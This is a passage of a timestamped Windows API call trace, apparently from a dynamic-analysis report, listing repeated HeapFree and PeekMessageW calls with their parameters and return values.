hHeap=0x12c0000) returned 1 [0119.551] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba928 | out: hHeap=0x12c0000) returned 1 [0119.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edd50 | out: hHeap=0x12c0000) returned 1 [0119.551] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba6d0 | out: hHeap=0x12c0000) returned 1 [0119.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba718 | out: hHeap=0x12c0000) returned 1 [0119.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edf30 | out: hHeap=0x12c0000) returned 1 [0119.551] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba748 | out: hHeap=0x12c0000) returned 1 [0119.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba820 | out: hHeap=0x12c0000) returned 1 [0119.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edf10 | out: hHeap=0x12c0000) returned 1 [0119.551] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba7d8 | out: hHeap=0x12c0000) returned 1 [0119.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba718 | out: hHeap=0x12c0000) returned 1 [0119.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edf50 | out: hHeap=0x12c0000) returned 1 [0119.551] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.551] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba718 | out: hHeap=0x12c0000) returned 1 [0119.552] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba718 | out: hHeap=0x12c0000) returned 1 [0119.552] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ee000 | out: hHeap=0x12c0000) returned 1 [0119.552] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.552] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba718 | out: hHeap=0x12c0000) returned 1 [0119.552] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba748 | out: hHeap=0x12c0000) returned 1 [0119.552] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ee0b0 | out: hHeap=0x12c0000) returned 1 [0119.552] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.552] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba748 | out: hHeap=0x12c0000) returned 1 [0119.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba898 | out: hHeap=0x12c0000) returned 1 [0119.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edf40 | out: hHeap=0x12c0000) returned 1 [0119.553] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba748 | out: hHeap=0x12c0000) returned 1 [0119.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba760 | out: hHeap=0x12c0000) returned 1 [0119.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edff0 | out: hHeap=0x12c0000) returned 1 [0119.553] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba760 | out: hHeap=0x12c0000) returned 1 [0119.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba7f0 | out: hHeap=0x12c0000) returned 1 [0119.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edf40 | out: hHeap=0x12c0000) returned 1 [0119.553] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba7f0 | out: hHeap=0x12c0000) returned 1 [0119.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba7f0 | out: hHeap=0x12c0000) returned 1 [0119.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ee080 | out: hHeap=0x12c0000) returned 1 [0119.553] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba7f0 | out: hHeap=0x12c0000) returned 1 [0119.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba820 | out: hHeap=0x12c0000) returned 1 [0119.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edf80 | out: hHeap=0x12c0000) returned 1 [0119.553] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba820 | out: hHeap=0x12c0000) returned 1 [0119.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba838 | out: hHeap=0x12c0000) returned 1 [0119.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ee030 | out: hHeap=0x12c0000) returned 1 [0119.553] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba838 | out: hHeap=0x12c0000) returned 1 [0119.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba850 | out: hHeap=0x12c0000) returned 1 [0119.554] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edf10 | out: hHeap=0x12c0000) returned 1 [0119.554] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.554] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba850 | out: hHeap=0x12c0000) returned 1 [0119.554] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba898 | out: hHeap=0x12c0000) returned 1 [0119.554] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edf40 | out: hHeap=0x12c0000) returned 1 [0119.554] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.554] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba898 | out: hHeap=0x12c0000) returned 1 [0119.554] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14baad8 | out: hHeap=0x12c0000) returned 1 [0119.554] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ee080 | out: hHeap=0x12c0000) returned 1 [0119.554] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.554] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14baa30 | out: hHeap=0x12c0000) returned 1 [0119.554] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14baa48 | out: hHeap=0x12c0000) returned 1 [0119.555] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eded0 | out: hHeap=0x12c0000) returned 1 [0119.555] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.555] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bac40 | out: hHeap=0x12c0000) returned 1 [0119.555] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14baa60 | out: hHeap=0x12c0000) returned 1 [0119.555] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edf90 | out: hHeap=0x12c0000) returned 1 [0119.555] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.556] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14baa30 | out: hHeap=0x12c0000) returned 1 [0119.556] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bac40 | out: hHeap=0x12c0000) returned 1 [0119.556] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edee0 | out: hHeap=0x12c0000) returned 1 [0119.556] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.556] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14babf8 | out: hHeap=0x12c0000) returned 1 [0119.556] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14baa00 | out: hHeap=0x12c0000) returned 1 [0119.556] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edff0 | out: hHeap=0x12c0000) returned 1 [0119.556] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.556] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14babb0 | out: hHeap=0x12c0000) returned 1 [0119.556] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14baac0 | out: hHeap=0x12c0000) returned 1 [0119.556] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ee0c0 | out: hHeap=0x12c0000) returned 1 [0119.556] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.556] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14babf8 | out: hHeap=0x12c0000) returned 1 [0119.556] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14baaf0 | out: hHeap=0x12c0000) returned 1 [0119.556] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edfe0 | out: hHeap=0x12c0000) returned 1 [0119.556] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.556] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14baaa8 | out: hHeap=0x12c0000) returned 1 [0119.556] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14baad8 | out: hHeap=0x12c0000) returned 1 [0119.556] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ee0c0 | out: hHeap=0x12c0000) returned 1 [0119.556] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bab50 | out: hHeap=0x12c0000) returned 1 [0119.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14babb0 | out: hHeap=0x12c0000) returned 1 [0119.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ee030 | out: hHeap=0x12c0000) returned 1 [0119.557] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14baa60 | out: hHeap=0x12c0000) returned 1 [0119.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bacb8 | out: hHeap=0x12c0000) returned 1 [0119.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edfe0 | out: hHeap=0x12c0000) returned 1 [0119.557] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14baa00 | out: hHeap=0x12c0000) returned 1 [0119.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bac28 | out: hHeap=0x12c0000) returned 1 [0119.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ee0b0 | out: hHeap=0x12c0000) returned 1 [0119.557] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14baa60 | out: hHeap=0x12c0000) returned 1 [0119.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bab68 | out: hHeap=0x12c0000) returned 1 [0119.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edfe0 | out: hHeap=0x12c0000) returned 1 [0119.557] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14babc8 | out: hHeap=0x12c0000) returned 1 [0119.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14baaa8 | out: hHeap=0x12c0000) returned 1 [0119.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edfe0 | out: hHeap=0x12c0000) returned 1 [0119.558] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14baa60 | out: hHeap=0x12c0000) returned 1 [0119.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bac10 | out: hHeap=0x12c0000) returned 1 [0119.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edfe0 | out: hHeap=0x12c0000) returned 1 [0119.558] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bac40 | out: hHeap=0x12c0000) returned 1 [0119.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bac58 | out: hHeap=0x12c0000) returned 1 [0119.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edfe0 | out: hHeap=0x12c0000) returned 1 [0119.558] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14baac0 | out: hHeap=0x12c0000) returned 1 [0119.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bacb8 | out: hHeap=0x12c0000) returned 1 [0119.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edee0 | out: hHeap=0x12c0000) returned 1 [0119.558] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bac70 | out: hHeap=0x12c0000) returned 1 [0119.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14babc8 | out: hHeap=0x12c0000) returned 1 [0119.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edee0 | out: hHeap=0x12c0000) returned 1 [0119.558] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bab20 | out: hHeap=0x12c0000) returned 1 [0119.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bab38 | out: hHeap=0x12c0000) returned 1 [0119.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edee0 | out: hHeap=0x12c0000) returned 1 [0119.559] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14babc8 | out: hHeap=0x12c0000) returned 1 [0119.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bac28 | out: hHeap=0x12c0000) returned 1 [0119.559] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.559] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.559] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.559] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.559] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.559] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.559] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.559] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.559] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.559] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.559] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.559] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.560] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.560] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.560] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.560] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.560] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.560] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.560] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.560] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.560] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.560] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.560] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.560] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.560] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.560] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.560] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.561] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.561] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.561] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.561] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.561] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.561] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.561] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.561] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.561] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.561] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.561] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.561] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.561] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.561] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.561] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.561] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.562] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.562] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.562] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.562] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.562] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.562] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 